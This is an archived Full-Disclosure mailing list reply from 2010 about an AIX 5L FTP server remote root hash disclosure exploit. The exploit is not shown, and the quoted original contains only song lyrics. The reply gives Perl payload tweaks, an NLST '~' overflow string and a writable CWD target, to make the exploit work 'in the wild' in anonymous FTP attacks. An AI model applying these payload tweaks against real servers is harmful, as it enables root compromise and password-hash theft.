lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Thu, 22 Jul 2010 18:13:47 +0200
From: "HI-TECH ." <isowarez.isowarez.isowarez@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH
	DISCLOSURE EXPLOIT ~ =--

Hello list.

Just checked: If the exploit doesn't work in the wild, try playing with the
source..

change
print $sock "NLST ~" . "A" x 5000 . "\r\n";
to
print $sock "NLST ~" . "A" x 2000 . "\r\n";

and change

print $sock "CWD pub\r\n";
to
print $sock "CWD writeable-folder-here\r\n";
for anonymous ftp attacks.

Cheers!

Kingcope

2010/7/18 HI-TECH . <isowarez.isowarez.isowarez@...glemail.com>

> (SEE ATTACHMENT)
>
> ---
>
> Bad luck wind been blowin' on my back
> I was born to bring trouble wherever I'm at
> With the number '13' tattooed on my neck
> That ink starts to itch
> Black gon' turn to red
>
> I was born in the soul of misery
> And I never had me a name
> They just give me a number when I was young
>
> Got a long line of heartache
> I carry it well
> The list of lives I've broken
> Reach from here to hell
> And a bad luck wind been blowin' on my back
> Pray you don't look at me
> And I pray I don't look back
>
> I was born in the soul of misery
> And I never had me a name
> They just give me a number when I was young
>
> Found me with a preacherman confessin' all I done
> Catch me with the devil playing 21
> And a bad luck wind been blowin' on my back
> I was born to bring trouble wherever I'm at
>
> I was born in the soul of misery
> And I never had me a name
> They just give me a number when I was young
> When I was young
> When I was young
> When I was young
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ